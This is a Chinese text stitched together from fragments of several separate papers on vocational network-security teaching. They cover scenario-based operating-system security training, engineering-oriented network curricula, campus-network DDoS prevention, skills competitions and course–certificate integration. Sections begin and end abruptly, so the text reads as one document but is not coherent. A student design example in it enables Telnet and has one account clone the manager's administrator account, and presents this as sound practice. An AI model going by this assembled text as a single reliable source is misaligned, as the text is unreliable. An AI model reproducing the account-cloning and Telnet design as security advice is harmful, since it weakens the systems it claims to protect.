4.3 教学难点
网络安全防护工程方案的设计与实施:通过Windows XP、Vista、Windows 7、典型网站、典型网吧和典型企业网络安全防护方案的设计与实施,掌握一般网络安全防护方案的设计与实施。
5 课程考核标准与教学效果
6 教学队伍
本课程教学团队现授课教师有7人,专业学术带头1人,专职教师中副教授2人,讲师3人,助教1人;其中具有硕士学位2人,在读硕士3人,“双师素质”教师达100%以上;网络架构工程师1人共同实施;达到理论实践的紧密结合,理论支撑实践操作的提高,实践技能验证理论的指导。在教学活动中,教师和学生相互学习,共同提高。本课程在建设过程当中逐步形成了一支学历、职称结构合理、师资配置完善、梯队建设良好、结构比例相对稳定的教学队伍。
7 教学改革创新与努力方向
7.1 教学改革创新
本课程采用校企合作、“教-学-做”一体化的教学模式。由本院与蓝盾股份有限公司紧密合作,组建蓝盾信息安全实验室,为“教-学-做”一体化教学提供了非常好的条件。
教学内容改革:教学内容与岗位工作内容的一致性。
本课程采用:模块课程模式项目(任务)课程模式活动课程模式工作过程系统化课程模式。
考核方式的改革创新
评价依据:过程技能考核+笔试 摒弃了传统的一卷考核方式,更加关注于学生的职业能力和职业素质的评价,创新性地采用了专业交流的方式,通过师生对专业问题面对面的探讨来增强学生的学习动力,同时考查学生专业能力。
7.2 努力方向
完善教学课程内容,探索新的教学手段;建立题库迎合学生考取认证;丰富项目案例资源不断改进教学方法;进一步完善师资队伍结构,培养并形成一支教学水平高、专兼结合的高素质教学队伍。
8 结语
目前,职业教育正处于日新月异的课程改革过程中,努力提升高职教育教学理念,创新体制机制,突出实践教学,深化课程改革,更新教学手段,课程说课作为现代高职教学改革的新课题、教学研究工作的新形式进一步彰显实践教学特色,必将成为推动我国高等职业教育发展的新动力。
参考文献
[1] 穆惠英.高职《环境监测》课程说课设计.中国科教创新导刊,2008.11.
[2] 秦毅,齐欣.《平面处理技术》课程说课设计案例.电大理工,2011.3.
[3] 陈丽,伍善广.高职高专《药剂学》.海峡药学,2011.23(8).
[4] 秦爱梅.高职院校《3dsmax》课程说课设计.计算机光盘软件与应用,2012(12).
关键词:操作系统安全;工作场景;实训教学
高职院校课程改革是加强学校内涵建设的需要,但职业教育课程始终未能跳出学科体系的束缚,使之成为被简化、被压缩了的学科课程的翻版,严重制约了高职教育的发展。国家教育部组织相关行业、企业专家、生产一线的技术人员及职教专家,以相关行业人力资源需求预测为基本依据,以就业为导向,以能力为本位,按照工作流程和岗位需要共同开发了以“核心课程与训练项目”为主要架构的教学指导方案,突破了职业教育以课程讲授和原理验证为主的传统教学模式,充分考虑到用人单位的需求,赢得了行业、企业的认可和支持[1-2]。
在“操作系统安全实训”课程的教学过程中,学生以小组形式模拟一个项目组,在类工厂的实训室中,将系统安全规划设计开发过程和工作情景引入课堂,使学生在近似于实际工作过程的情景下,扮演相关角色,完成相关任务。充分培养了学生的系统规划设计能力、团队合作能力、工程应用能力[2]。通过工作场景模拟实训课程的思想,在工作环境中开阔了学生视野,锻炼了学生的团队意识和工作意识,为今后走上实际工作岗位、开发项目积累经历和经验,为教师综合评价学生提供了依据。
1工作场景模拟教学法
1.1教学法的内涵和特征
工作场景模拟教学法[3]是在教学过程中,使用一种近似于实际工作的真实场景,模拟工作中可能发生的真实事件,再现工作真实过程的情景和环境,让学生按照工作流程,在各工作场景中扮演接近真实身份的角色,通过场景中的一些情节,体验和理解其扮演角色的作用、工作内容等,从而理解教学内容,达到“寓教于景”教学目的的教学方法。
工作场景模拟教学法由以下几个特征:1)实践性强。能为学生提供一个接近真实的工作场景,在工作环境中体验学习,将理论知识和实际操作应用于项目,在工作中能充分表现自己的才能,发挥创新潜能,从而增强对实际问题的预测与处理能力。2)动态性强。在教学中,学生是活动的主体,教师只起组织指导作用。3)交互性强。表现在学生之间对项目规划讨论,学生与教师的主动交流,有利于知识的传递和思想的集中。4)协作性强。项目由小组共同完成,有利于创设和谐的学习氛围,培养学生团队合作能力。
1.2教学法的迫切性
目前,社会及用人单位对学生动手实践能力要求高,希望学生一毕业就能够上岗完成实际开发任务。一些学校为适应这种需求,尽量送学生去企业或相关单位实训,但这种实训往往因为条件限制、人为因素等不能满足所有学生。而在课堂上完成实训任务,按照传统的教学模式,教师出题目、提要求,最后进行检查,学生不能很好地体验实际项目开发的规则、制度、过程、管理和规范,与实际的工作场景严重脱节。
2操作系统安全实训课程设计与组织
在实际项目开发中,项目组经常会采用封闭式集中开发的形式,便于学生今后能够在实际岗位中适应这种形式的工作。在考勤上模拟工作考勤制度,学生实训时间从下午3点到晚上9点,中间有1小时休息时间,下午3点上课前利用电脑上的联创系统实行实名签到制度,模拟工作中的上班打卡,晚到学生要根据迟到时间长短扣除相应平时出勤分数,模拟工作中扣除工资和奖金;工作时间严格控制学生出入次数和时间;严格控制网络,只允许项目组长上网,对外网信息的上传进行控制最大不超过1M,不允许使用优盘等存储设备(防止公司信息外泄);晚上9点同样模拟工作场景,严格控制下班时间。看似很残酷的考核制度,实际上是让学生真正体会职场的严格制度和工作艰辛。具体教学过程设计如图1所示。
1) 第1阶段。
根据实际情况以5~6人为单位进行分组,成立项目组推选出组长(项目经理),成立以教师为领导、各项目经理为成员的临时评审团。同时,教师公布事先准备好的几个公司的项目需求(以类似于招标书的形式于内网服务器)供学生选择(图2给出其中1个中型企业的项目需求)。
公司背景:
绍兴XX公司是一家年产值上亿的中型企业,总部在绍兴市区,有多家子公司分布在上虞、诸暨等地,公司网络曾经发生过几次网络安全事件,给公司带来了一些经济损失,公司决定增加网络安全投入,提高网络安全管理水平。
具体需求:
1. 用一个虚拟机模拟公司总部,一个虚拟机(或者是主机)模拟子公司或外地出差人员。
2. 总部和子公司需要使用VPN通信(为了保证信息的安全防止中间人攻击,采用IPSEC来保证隧道的安全性)。
3. 公司总部的Web、Ftp等服务器对内网用户开放。
4. 公司内部不同部门不同职位所具有的权限不一样。
图2某中型企业的需求
项目组根据所学的操作系统安全和局域网组建知识及本组的实际情况,选择一个合适的需求,收集信息,共同讨论,分析规划,撰写项目设计初步方案和汇报PPT,最后写出相应的投标书。在指定时间,由各小组派代表介绍自己的项目规划,接受评审团的提问(记录相关信息并给出成绩),由评审团投票决定是否通过,若落选,重新选题,否则公布结果(包括第1阶段的成绩)。
2) 第2阶段。
项目组提出设计方案,图3给出某项目组对上述需求的设计方案,然后制定项目计划,再由项目经理对项目进行划分(提交教师审核),最后下发任务给项目成员。在实训室中尽可能的模拟真实的工作环境和条件,完成项目设计方案的内容,测试人员同步跟进,及时记录测试清单,教师巡回指导,碰到共性问题集中讲解,包括对部分理论知识的讲解。在开发过程中严格控制工作进度,各小组“下班”前,提交每天的开发日志(模板如图4),明确当天的进度完成程度,如未按计划完成则给出理由和解决方法。项目经理按时向教师汇报小组情况,以便教师掌握项目的实施进度。项目实施完成后,小组之间进行交叉测试,检查是否全部实现项目所要求的内容及其实用性、可操作性、效率等,并及时进行修正。最后,撰写竣工报告和项目汇报的PPT。
某小组作为网络安全公司,为该中型企业设计的安全管理方案,实现以下安全要求:
1. 子公司可以通过IPSEC安全方式构建VPN隧道技术。
2. 为了防止黑客通过445端口在局域网中轻松访问各种共享文件夹或共享打印机,故在总部关闭445端口,开始开启TELNET服务。
3. 公司总部为经理、技术总监、普通员工,分配不同权限的账号,经理具有管理员权限,是管理员组的一员;技术总监是和普通员工都是普通账号;公司改革,经理兼任技术总监,故希望技术总监账号克隆经理账号,共享其所有权限。为了节约磁盘空间,对普通用户设置磁盘配额,每人只能使用350M的空间,超过200M发出警告,而所有普通员工自己增加的文件和文件夹都要用EFS加密,并导出其密钥。
4. 公司规定所有账号都不得采用弱密码,开启复杂性要求、设置最小密码长度为6、密码最长留存期为30天。
5. 公司为了实现信息公开化,信息共享,创建了Web、Ftp两个服务器,并设置了DNS,方便域名访问。对于Web站点公司希望实现一个站点对应两个IP地址(因为公司地址将有电信、网通的,而暂时只有电信的,为了防止环路,要求在同一张网卡下配置多个IP地址),同时希望隧道用户才能访问站点,并限制带宽为5M,连接数为50。同时Ftp服务器实现匿名访问,只允许隧道用户访问,限制连接数量为25,要求能读写。
图3某中型企业的设计方案
项目名称 组号
项目组成员
时间 地点
时间段
每名同学的工作内容
01 02 03 04
是否完成
进度
遇到的问题及解决方法
工作心得
参考资料
图4项目开发日志
3) 第3阶段。
各小组向全班同学介绍演示自己的项目,随时接受班级同学提问,分享项目开发经验。评审团按照学
生提交的工作成果,参照项目进度计划和项目需求,确认总结学生的阶段工作成果。教师对小组的整体设计以及在实训中的问题进行评析,公布相应成绩。最后由学生和老师共同评选出最佳项目组。
3教师在模拟过程中的作用
在整个工作情景模拟过程中,教师的位置应处于辅助地位,学生是主角,教师协助各开发小组完成实训任务。
1) 明确角色和任务。引导每个学生明确自己的角色和任务,提醒和引导学生成功扮演相应角色,起到一个导演的作用。
2) 跟踪监控工作过程。跟踪项目规划设计实施的全过程,通过旁听讨论会、检查记录,及组长的进度汇报来监控小组的方向;检查开发日志监管系统质量和进度;检查考勤情况,监控遵守和执行规章制度的情况;通过评审监控最终系统的效果和质量。
3) 指导和帮助。在第1阶段,负责为学生提供各种文献资料或查阅文献资料的途径,帮助学生制定调查问卷和讨论主题,提供规划设计及投标书的规范说明,并根据讨论会记录和需求规格说明,给出建议和意见。在第2阶段,帮助解决学生未能解决的问题。在第3阶段,帮助学生规范测试过程和测试报告的书写,参与评审答辩,帮助学生完善系统功能和性能。
4) 评价。观察每个学生在工作过程中的表现,包括出勤、工作态度、参与情况、工作量,通过评审其所负责部分的系统设计和开发质量,以及各阶段的小组成绩,给出每个学生的总体评价或总评成绩。
4结语
工作场景模拟教学法应用于操作系统安全实训课程,是对实训课程的科学改革。该方法既有利于课程目标的实现,又使学生角色扮演中,体验到真实项目实施的工作过程、工作场景和相关制度、规则及规范,让学生对未来职场有感性的认识和了解,为走上IT工作岗位做实战准备。
参考文献:
[1] 姜大源. 当代德国职业教育主流教学思想研究:理论、实践与创新[M]. 北京:清华大学出版社,2007:50-100.
[2] 钱宇虹. 基于工作过程的高职软件项目开发综合实训开发探索[J]. 计算机教育,2008(20):175-178.
[3] 闫乐林,蔡平胜,元莱滨. 场景模拟教学法在“计算机网络”课程中的应用研究[J]. 计算机教育,2009(18):116-118.
[4] 柴巧叶. 基于“中小型网络构建与管理”的项目教学的探索与实践[J]. 计算机教育,2009(22):132-134.
Research on Operating System Security Training Based on Working Scenario Teaching
DU Huan-qiang, YUAN Si-da, CHEN Jun
(Department of Computer Science, Zhejiang Industry Polytechnic College, Shaoxing 312000, China)
一、计算机网络专业面向工程的教学改革思路
针对不同阶段的实验教学确定不同的任务定位。院定必修课着眼于提高学生的科学素质与人文素养,以培养学生的基本实验技能、科学的思维能力和创新意识为主要教学目标。系定必修课和专业方向课及实践教学着眼于对学生进行工程技术人员的基本训练,以培养工程实践能力和创造能力为主要教学目标。
针对传统的专业实验课与工程严重脱节的状况,实行专业实验课的工程化,即系定必修课程及实验课要面向工程,要紧紧围绕工程和联系工程进行。
针对传统的专业实验基本都是验证性实验的状况,增设综合性、设计性和创新性实验,以培养学生的创新能力和综合实践能力。
针对传统的专业实验课从属于理论课的状况,实行独立设置的实训课程和单独考核。在进入毕业实习前,进行一次网络工程综合实训,这一独立设置的实训课程名为网络集成技术,它涉及网络技术的所有方面,并可通过专业实验室实施。
针对高等职业院校只局限于校内教学活动的情况,实施“走出去、请进来”的面向工程的授课方式,加强校内外实习实践基地建设。
二、计算机网络专业面向工程的实践教学体系
建立面向工程的实践教学体系是一个复杂的系统工程。该体系包含三个部分:课程体系及内容、网络实践体系(实验、实训和实习)、网络工程应用。在该体系中,要始终以网络工程应用为最终目标,建立课程体系、整合课程内容,设置层次网络实践体系;课程体系及内容服从、服务于网络实践;网络实践容服从、服务于网络工程应用。
1.建立面向工程的课程体系
从应用型人才培养的全局来看,当前课程改革的主要任务是重新审定、合理调整总的课程设置。在计算机网络专业中,减少专业必修课,按照计算机网络、网络工程、网络管理与安全和网络软件开发4个方向增加选修课。明确每门课程在培养计划中的地位与作用,增加综合素质养成需要的宏观性课程,充实新兴的高科技应用成果。
课程改革不仅要以就业岗位群对人才知识结构的要求为依据,建立模块化的课程体系,而且要改革课程内容设置,打破课程的界限,根据高职计算机网络教学的实际,进行课程内容的整合与拆分,提高课程教学的效果和质量。
调整网络专业系定必修课和实验课的教学方式,将实验、实训、实习等实践性课程与理论教学有机统一起来,面向工程应用实施教学计划,重点突出知识的应用性和实践性。
2.建立面向工程的网络实践体系
面向工程的实践教学体系包括实验、实训和实习三个部分。实验基于网络基础理论知识,进行基本技能的培养。实训主要锻炼学生对网络工程的整体规划、设计和创新能力。实习要求学生走出校园进入企业锻炼,在实际网络工程项目实践中进行锻炼,总结经验、教训,提高综合设计创新能力。其中,实验是工程实训的基础,实训又是实习的基础,这三者之间关系是逐层深入的,从而形成了系统而有层次的实践教学体系。
(1)实验项目的设计。按照实验教学方式,实验教学分为以下几种形式:验证性实验、综合性实验、设计性实验和研究创新性实验。过去在教学过程中,多以验证性实验项目为主,各任课教师需要进一步优化设计课程实验方案,适当精简验证性实验,增加综合性实验和设计性实验比重。实验教学做到精讲多练。
(2)实训项目的设计。在本专业“计算机网络”、“网络工程”、“网络管理与安全”和“网络软件开发”等多门课程学习的基础上,增加了“计算机网络工程综合实训”这门课程,通过2个专业实践周完成。目的是将所学的网络基础知识结合实际网络工程项目要求进行系统性的训练。实训业务参照各行业信息化规范、企业用人标准和岗位要求,从职业道德和职业技能两方面强化学生的能力培养,其培养目标涵盖:项目经理、网络架构设计师、网络施工员、网络维护员、网络管理员和信息安全师等。计算机网络综合实训的内容包括:工作组级局域网设计与应用;校园网的规划与设计;校园网站建设维护;电子商务平台建设维护;企业构建IP电话系统。
(3)网络工程实习。实施“走出去、请进来”的面向工程的授课方式。建立校企培养模式,使学生即学即用,了解网络技术及施工特点和规范,激发学生的学习兴趣,达到了传统教学方式所不及的效果。同时,聘请一批网络工程和网络开发第一线的工程技术人员,定期到校进行课程教学和开设讲座,让学生了解到网络技术新发展、新工艺,通过讲课和讲座,提高学生对专业实践能力的重视程度。
3.面向工程的网络实验、实训平台的设计
面向工程的网络实验、实训平台应提供真实的网络环境,可以让学生亲自动手完成实验实训项目,加深对网络原理、协议、标准的认识,从而提高学生的网络技能和实战能力。因此,网络实验实训平台的建设尤为重要。根据实验台功能的不同,分为基础实验台、安全试验台、无线试验台和VoIP实验台。每种试验台由实验需要的硬件组成,包括路由器、核心交换机、三层交换机、二层交换机、防火墙、工作站、服务器、无线AP、VoIP语音模块等。该环境有很强的适应性,根据不同的实验实训要求,可以配置不同的基础平台,如软件开发平台可以直接提供路由和DNS环境,网络安全实验台则可提供完全的Internet技术环境。该平台可以实现计算机网络、网络工程、网络管理与安全和网络软件开发4个方向的所有实验实训项目。实现了理论的实验化、实验的工程化、工程的系统化、系统的集成化。
4.实验、实训成绩考核与效果评价
关键词:校园网;DDoS;防范;措施
中图分类号:TP393 文献标识码:A 文章编号:1009-3044(2014)20-4716-02
Campus Network DDoS Attack Prevention Measures
ZENG Xiao-jie1 ;ZHOU Zai-hong2
(1.Loudi Vocational & Technical College, Loudi 417000,China;2.Guangdong Medical College, Dongguan 523808,China)
Abstract: The campus network in Colleges and universities because of some inherent problems of its own development, make it vulnerable to the attack of various security threats such as DDoS etc.. In this paper, the author through the observation and analysis of the campus network for many years, the campus network DDoS attack prevention measures, and achieved good results.
Key words: campus network; DDoS; prevention; measures
近年来,高校教育信息化出现迅猛发展的态势,高校校园网出现了新的建设,新设备、新技术不断涌现。可是,由于网络的开放性以及日益泛滥的病毒和攻击工具,校园网的安全问题日益凸显,如计算机病毒、拒绝服务、网络漏洞、网络资源滥用等校园网络事件不断出现。分布式拒绝服务攻击(Distributed Denial of Service―DDoS) 是互联网安全的严重威胁[1],在校园网内也时有发生,对校园网造成了很大的后果,严重影响了学校正常的教学、科研、管理工作的顺利开展。该文从校园网安全状况的角度,分析了DDoS攻击方式和简单判定方法,并总结了校园网防范DDoS攻击的一般性措施。
1 校园网络安全现状
高校校园网络的建设,一般建成了核心、汇聚、接入三个网络结构层次,核心节点间的互联链路,核心节点与汇聚节点间的互联链路以及汇聚节点的设备间组成的网络为骨干层,其他部分为接入层。高校校园网核心层和汇聚层一般采用了Cisco、H3C、华为、锐捷等主流厂商的高端设备。各种安全设备也大量使用,如IPS,流量检测清洗设备、防DDoS防火墙等。校园网管理部门则负责校园网的建设,包括规划、设计、实施以及业务维护。这样的网络结构和设施使对加强校园网络安全有了较好地基础,但校园网在网络安全上有独特的特点,这些特点决定了校园网会受到来自于学校内外的各种网络安全问题的威胁[2]:
1) 校园网硬件设施投入大,用户数多,一旦出现网络安全问题,在校园网络中会迅速蔓延,后果严重。但校园网的建设和管理通常对网络安全重视不够,管理投入明显不足,这样就造成了对校园网络安全管控的力不从心。
2) 校园网中的应用系统软件盗版严重,存在网络安全漏洞, 如木马和后门等,给校园网络安全造成很大隐患,网络入侵就乘虚而入。
3) 来自校园网内的安全威胁不容忽视。大学生这一活跃的用户群体好奇心强,特别是对黑客技术感兴趣,经常尝试使用各种黑客技术进行恶作剧般的网络攻击,这些出于好奇的非恶意攻击,是对校园网安全的很大的考验。
4) 由于校园网开放的网络环境决定了校园网络的管理也是宽松的。为保障校园网络资源的充分共享及应用的方便,校园网络中一般不会有过多的网络限制措施,甚至校园网中各种安全技术及措施也没有进行有效的配合,安全设备设施不能发挥其最大的作用。
由此可见,校园网从管理和应用上存在很多的问题,这些问题的存在使校园网络受到DDoS攻击越来越容易。
2 判断校园网DDoS攻击的简单方法
DDoS攻击也称之为“洪水攻击”, 它利用TCP/IP协议的漏洞,通常采用几百台甚至几千台分布的主机并发地对单个或多个目标进行攻击,消耗目标主机或目标网络的资源,从而干扰或完全阻止为合法用户提供服务[3]。
针对校园网络安全独有特点,校园网DDoS攻击一般表现出两种形式:流量型的DDOS攻击和资源耗尽型的DDoS攻击[4]。在攻击发生时,对校园网络带宽或主机,利用大量的DDoS攻击数据包致辞使网络带宽被阻塞,或消耗主机的内存,或占用CPU应用程序,从而无法提供正常的网络服务。
在校园网内,如何判断主机服务器是否遭受 DDoS攻击呢?可以从主机CPU使用率、内存、网络流量、网络速度等方面的变化来判定主机是否遭受了DDoS攻击。如一台主机出现明显超出该网络正常工作时的极限通信流量的现象且持续时间较长,这就表明存在DDoS攻击的通信。另外如主机出现不属于正常连接通信的TCP和UDP数据包,如出现特大型的ICP和UDP数据包。还有如主机服务器接入网络,但不能操作,或访问速度非常慢,断网则正常,或重启主机服务器也能恢复,则说明遭受了DDoS攻击。
如要进一步确认主机服务器是否遭受了DDoS攻击,有一种简单的测试方法,就是用Ping命令来测试。若对主机突然Ping不通了或丢包严重,则可能遭受了DDoS流量攻击,还可以Ping连接在同一交换机上的主机服务器,若也不能正常访问,就基本可以断定该主机遭受了DDoS流量攻击。而对于校园网内的资源耗尽型DDoS攻击的判断则更简单,如Ping主机时突然发现主机访问很慢甚至不能访问了,但还可以Ping通,则很可能遭受了资源耗尽型DDoS攻击。还有Ping自己的主机不能Ping通或严重丢包,但Ping同一交换机上的其它主机服务器则正常,这就说明主机遭受DDoS攻击后而占用主机CPU,造成主机无法回应Ping命令。这种情况下,网络带宽还是有的,否则就Ping不通同一交换机上的其它主机了。
3 DDoS攻击防范措施
校园网要防御DDoS攻击,要从校园网络设施、网络安全策略设置及网络管理等多方面考虑其防范措施。
1) 校园网硬件方面。首先是从网络结构上要设置合理。校园网一般采用核心、汇聚、接入三个网络结构层次,重要应用系统应设置成中立区。采用V L A N 技术对校园网进行针对性的划分,如划分为学生区、教学区、宿舍区、实训区等,并根据各子网的安全保密程度进行合理分布,防止局部安全性较低的网络系统造成的威胁传播到整个网络系统,这种结构为实施DDoS攻击检测提供了良好地基础。其次是采用高性能的网络系统设备和安全设备。设置防火墙,充分发挥防火墙的过滤、NAT转换、安全访问控制、漏洞防范等功能和防DDoS攻击属性,有效地防止DDoS攻击的入侵。设置IPS即入侵防御系统。IPS入侵防御系统是一种主动式的安全防护设备,在不影响网络性能的情况下发现非法的入侵行为,对来自网络内外的DDoS攻击行为进行实时保护。Cisco、H3C、华为等主流设备厂商均有很好的网络与安全设备,这些设备对DDoS攻击的策略设置是采用WEB界面方式进行设置的,方便简单。可以使IPS和防火墙的安全策略相互配合,防范DDoS攻击的效果更加明显。再次要有充足的网络带宽。带宽越大,防DDoS攻击能力越强。
2) 网络安全策略设置方面。首先设置校园网用户身份认证。设置校园网用户身份认证机制,建立相应的身份认证系统或统一的身份认证平台,防止对网络资源的非授权访问以及越权操作,这对防范非法DDoS入侵的效果明显。其次设置访问控制。访问控制是网络安全防范和保护的主要策略,主要任务是让网络资源不被非法使用和非正常访问,校园网络访问控制策略是防范DDoS攻击的重要措施。再次加强系统优化。要确保服务器的系统文件是最新的版本,并及时更新系统补丁和过滤软件,关闭一些不必要的服务。通过修改注册表来减弱DDoS的攻击能力,如减少生存时间、防止SYN洪水攻击、限制同时打开的SYN半连接数目、缩短SYN半连接的time out 时间、禁止C$、D$、ADMIN$、IPC$等缺省共享[5]。
3) 网络管理方面。首先要有健全安全管理体制,有一支技术合格、高度负责的校园网络安全管理维护队伍,要加强相关人员的技术培训,要有相应的网络安全问题应急处理方案。其次要定期地对网络及应用系统进行安全检查及备份,做好日志记录。再次要加强校园网用户的安全意识,加强病毒防范,防止木马入侵,经常进行系统升级更新。
我校在校园网的日常安全管理上想了很多办法,如经常使用ping命令和netstat一an命令对网络进行测试,检测网络服务器访问情况等。对网络安全设备的安全策略进行调试,以适应网络应用系统的变化。通过采取一系列措施后, 对DDoS攻击行为达到了较好地防御目的。
参考文献:
[1] 黑客解密攻击方法,阐述如何防御攻击.中国经济网httP:///cysc/tech/i tsh/200803/03/t20080303_14706816.shtml,2008.3.
[2] 金忠伟.黑龙江畜牧兽医职业学院校园网安全体系建设[D].哈尔滨理工大学,2007:3-4.
[3] Felix Lau, Stuart H.Rubin, Michael H.Smith et al.Distributed denial of service attacks. In:IEEE International Conference on Systems, Man, and Cybernetics. Nashville, October 2000, Pages: 2275-2280.
一、职业技能竞赛对实践教学的促进作用
2014年《国务院关于加快发展现代职业教育的决定》中就提出“推进人才培养模式创新。坚持校企合作、工学结合,强化教学、学习、实训相融合的教育教学活动。……开展职业技能竞赛。”2016年全国职业院校技能大赛中职组的“网络搭建与应用”赛项规程也明确了竞赛内容,是“通过对计算机网络和集成企业进行调研和分析,根据行业企业业务背景进行网络业务需求分析、技术应用环境分析、理解实际的工程应用与业务架构分析。中职计算机网络专业毕业生主要从事系统集成、系统应用、网络工程、网络安全及售后技术支持等五个岗位,竞赛内容即岗位工作主要内容”。由此可见,计算机网络专业的学习内容就是中职毕业生今后要主要从事的工作,要和企业需求形成无缝对接。在广西壮族自治区,无论是学生层面还是在教师层面,“网络搭建与应用”项目都是职业技能大赛中的常设项目。该项目不但能很好地检验学生的技能水平,也检验教师的技能水平及指导能力。职业技能竞赛与日常实践教学结合,不仅能激发学生的学习热情,提高学生的实践动手能力,也能帮助学校建设“双师型”教师队伍,提高技能教学质量,从而使“以赛促学、以赛促教”成为真正有效的教学手段。
二、实施过程中遇到的问题
职业技能竞赛与实践教学能无缝结合是理想的状态,但笔者学校在计算机网络专业教学实施过程中发现,真正做到“将实践课程改革与技能竞赛相结合,汲取技能竞赛的内容和标准对实践课程进行及时更新、转化、提升”,是实践教学中的技术难点。具体表现在以下几个方面。1.受益面小,难以惠及全体学生参加“网络搭建与应用”项目技能竞赛的学生仅是几个人,他们拥有更多的训练机会。该项目的技术性较强,不容易学懂。赛前,指导教师都会对参加竞赛的学生进行一对一的辅导,在指导过程中参赛学生所遇到的无论是理论上还是技术上的问题是必须解决的,这也使得指导教师会比在教学上花更多的时间对学生进行指导。而对其他学生,任课教师所花费的时间将会少一些,也没那么多的精力去指导每一位学生,难以做到让每一位学生都能很好地掌握所学技能。因此,真正受益的学生不多,绝大部分学生得到的实训机会也仅限于课程安排的实训。2.实践教学难点渗透率低,易产生两极分化现象大多数中职生有厌学情绪,存在“理论不重要,会操作就行”的认识误区。然而对于计算机网络专业而言,理论知识是实践操作的必要支持。由于专业知识较难理解,教师在实践教学中结合了技能竞赛的内容难点进行教学指导,不少学生的学习积极性仍然不强,觉得“听不懂”“看不懂”。学生的实践操作能力直接决定专业人才的培养质量。3.专业教师难以兼顾日常教学和竞赛指导“网络搭建与应用”竞赛项目需要的是整体的相互配合,稍有错就很难进行下去。不少学校计算机网络专业的教师都是身兼日常教学和竞赛培训两项工作,在技能大赛的准备阶段,参赛选手通常都是选择在晚自习时间、周末双休日甚至是寒暑假备赛,这要求专业教师付出更多的业余时间来指导选手。而且竞赛内容常更新,要求指导教师也要与时俱进,不断学习新的知识点,这也是很费时费力的工作。因此许多教师为了兼顾日常教学,常常回避参赛指导。4.实践教学的教材不适用于日常教学市面上的计算机网络专业教材和大纲在相当一段时间内内容是相对不变的,这就容易与市场的反馈和企业的需求脱节。计算机网络专业知识和技术应用的更新是日新月异的,仅靠教材难以与时俱进。在实践体系改革尝试阶段,笔者学校先后采用了清华大学出版社《交换路由实用配置技术》与机械工业出版社《路由型与交换型互联网基础(第3版)》作为教材。前者理论部分较为详细,但实训部分是基于思科设备的,职业技能竞赛选用的设备却是神州数码的。笔者学校网络实验室主要的实训设备也是神州数码,因此教材不适用于设备。而后者虽然实训部分是基于神州数码设备的,但理论部分或过于晦涩,或过于简单,也不适用于日常教学。
三、经验总结
1.融合竞赛,设计适合学校自身特点的实践实训内容要解决受惠面积小的问题,让非参赛学生也能受益于职业技能竞赛,以满足企业的需求,学生的实训任务就需要具有很强的工程实践性。这就要求在设计课程实训内容时,了解学生已掌握的专业基础知识,结合技能竞赛内容的关键知识点,参考企业对人才的知识需求,结合教学内容以及实训设备,设计相关实训任务。例如大赛中可变长的子网掩码(VLSM)的划分,这是一个即使在教师赛中都很容易出错的部分。目前很多中职网络课程教材并不提及VLSM,但其又是网络工程一个很基础的理论知识点。对于“子网规划”的实训内容,为使学生理解为何需要VLSM,教师们自己设计了典型案例,采用场景教学法,以一个实际的网络工程设计作为背景来说明为何要节约IP地址空间、减少路由表大小,让非参赛的学生也能系统地学习计算机网络的一些关键技术。2.优化实践教学的教学评价模式要避免学生两极分化,就要修改并优化评价系统,让评价系统来调动学生的学习积极性。“网络搭建与应用”项目是一个团体竞赛,将技能竞赛的评分标准引入到实践教学的考核环节,可以直接对学生的实践能力、表达沟通能力和团队合作精神进行考核。具体考核学生网络部署、网络设备操作、服务器系统的管理等实际操作能力,合理设置其所占学生成绩比重,比如:学生评价=50%日常教学评价+50%期末考核评价。日常教学评价主要为课堂学习表现(如考勤、纪律、实训完成情况等)、阶段性考核、团队合作能力等。阶段性考核以通过实训课中增设的障碍性实验为主,考查学生解决问题的能力。对于障碍性实验的设置,主要将技能竞赛的内容与教学内容相结合,设置故障类、实验系统延伸类、实验方案调整类题目,考查学生对所学知识的掌握程度与解决实际问题的能力。期末考核以综合性题目为主,以考查学生的理论知识与工程实际综合运用水平。通过考核方式向技能和综合素质部分的侧重,可向学生传达专业课程以实践为主、理论为辅的教学思想,提升学生勤于思考、善于动手的实践技能训练意识。3.深化教师队伍的实践教学能力,调动教师教学的积极性要激励教师主动承担竞赛指导的责任,就要健全机制,完善配套制度。教师产学研践习成效与教师评价考核挂钩,与学校职务评聘、福利待遇、年终奖金等挂钩,与职务晋升、聘任等评价考核指标体系挂钩,从而激发教师的积极性与创造性。通过指导学生参赛,能促进教师不断学习,积极深入企业积累实战经验,让自己的专业知识与生产发展同步,教出来的学生能与企业需求匹配。参加和指导技能比赛,教师不但可以了解和学习本专业前沿技术、发展趋势、实践技能的考核点,提升自己本专业的实践水平,还能提高自己的收益,体现自身价值,真正实现“以赛促教”的双师型教学。4.深化校企合作,完善实践教学实训基地的建设在学校的教学中难以实现的是实践教学。要解决这一问题,就需要采用校企合作的方法。对于很多学校而言,所选企业是否适合教学实践也同样存在着不少问题。那么依托于职业技能大赛,学校与大赛设备供应商就能采取“实训基地”“校企合作工作室”这样的双赢合作模式。大赛供应商大多是国内实力雄厚的高新技术企业,如与笔者学校合作的神州数码、西安开元、新大陆教育等企业,它们不但能解决学校技术变革相对闭塞的问题,使学校增加了符合行业标准的实训器材,对实训基地的总体布局、设备配置、环境布置等方面严格把关,科学设计流程,努力实现与企业实际工作环境的“零距离”对接;它们还能提供师资培训,及时为帮助计算机网络专业教师提高自身的技术技能。
四、小结
笔者学校基于“计算机网络搭建与应用”竞赛项目,从实践教学的硬件和软件方面着手,已初步实现“以职业技能比赛为平台,以增强学生的实践动手能力和创新精神为基本导向,以提高学生综合素质,增强就业竞争力为目标”的实践教学方式。但探索中待解决的问题仍有许多,还需积极研究和探索,以期为同类中职校学生职业技能培养途径和方法提供思维启发和经验借鉴,丰富中职校人才培养模式。
作者:欧秋菊 单位:广西电子高级技工学校
参考文献:
[1]翁敏峰.高职院校《计算机网络基础》课程教学研究[J].电脑知识与技术,2010(02Z).
关键词:高职;网络专业;课证融合;教学改革
中图分类号:G712 文献标识码:A 文章编号:1672-5727(2013)10-0039-02
“课证融合”的内涵
“课”,即课程,广义的课程是指学校为实现培养目标而选择的教育内容及其进程的总和,包括学校所教的各门学科和有目的、有计划的教育活动;狭义的课程是指某一门学科的具体教学内容。
“证”,即证书,是指国家的职业资格证书或社会的技能证书,它表明就业者掌握的实际操作能力和职业胜任能力。这一类证书的显著特点是与职业岗位的具体要求结合密切,能更直接、更准确地反映特定职业的技能标准和操作规范。
“课证融合”是指以市场所需的职业资格证书为导向,以实现学生充分就业和有效就业为目标,将考证项目、职业岗位与课程体系相结合的一种人才培养模式,该模式要求课程设计与职业考证相对应,课程教材和教学内容与考证内容相一致,通过课程学习,学生可以直接参加相关职业资格证书的考试。
“课证融合”的背景
